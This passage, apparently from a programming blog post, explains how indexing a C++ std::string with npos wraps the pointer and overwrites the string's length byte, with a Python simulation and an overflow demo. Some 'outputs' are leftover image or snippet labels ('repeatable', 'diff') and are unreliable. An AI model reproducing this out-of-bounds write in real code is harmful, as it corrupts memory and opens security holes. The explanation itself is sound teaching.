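    # Pointer arithmetic wraps modulo 2**64, so data + npos lands at data - 1.
    address = (DATA_OFFSET + index) & MASK_64
    obj[address] = value


write_at(NPOS, ord("X"))
(length,) = struct.unpack_from("<Q", obj, LENGTH_OFFSET)
print(hex(length))  # 0x5800000000000003
```

The write lands on the most significant byte of the little-endian length field, which is why a tiny length of 3 suddenly becomes astronomically large.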

Let’s make 2 more strings in this program, and check whether the same thing happens to their lengths:

npos_src_2

That prints:

repeatable

So it’s repeatable! But why? How come, that

some_arbitrary_string[std::string::npos]

points to its length, always?

Well, as you probably know, variables can overflow, and so can pointers.
I’ll give you a short example of unsigned char overflow and then of pointer overflow, since they work the same way:

overflow_ex.png

It prints:

diff

If we add some value to a value that’s already the maximum for its type, we’ll end up with… ‘some value’ minus 1!

As you learned earlier in this post, std::string’s length sits in the 8 bytes right before its local data. So if we overflow the pointer to the local data by adding the max value it can hold, we end up 1 byte before the local data, in the length’s area, and that’s why some_string[std::string::npos] will always point to its length(…’s last byte)!
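The same wraparound can be checked with plain integer arithmetic. Python integers don’t overflow on their own, so this sketch applies the modulo explicitly; wrap_add is a hypothetical helper and the pointer value is made up:

```python
def wrap_add(a: int, b: int, bits: int) -> int:
    """Add two unsigned integers the way fixed-width hardware does: modulo 2**bits."""
    return (a + b) % (1 << bits)


# unsigned char: adding the maximum value (255) is the same as subtracting 1
print(wrap_add(100, 0xFF, 8))  # 99

# 64-bit pointer: adding npos gives the address one byte below
data_ptr = 0x7FFFFFFFDAA0  # made-up address of a string's local data
print(hex(wrap_add(data_ptr, 0xFFFFFFFFFFFFFFFF, 64)))  # 0x7fffffffda9f
```

Whatever the width, adding the all-ones value is indistinguishable from subtracting one, which is exactly what happens to the data pointer when it is indexed with npos.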

Conclusion

I wish I could just find a blog post like this on the internet instead of writing it myself.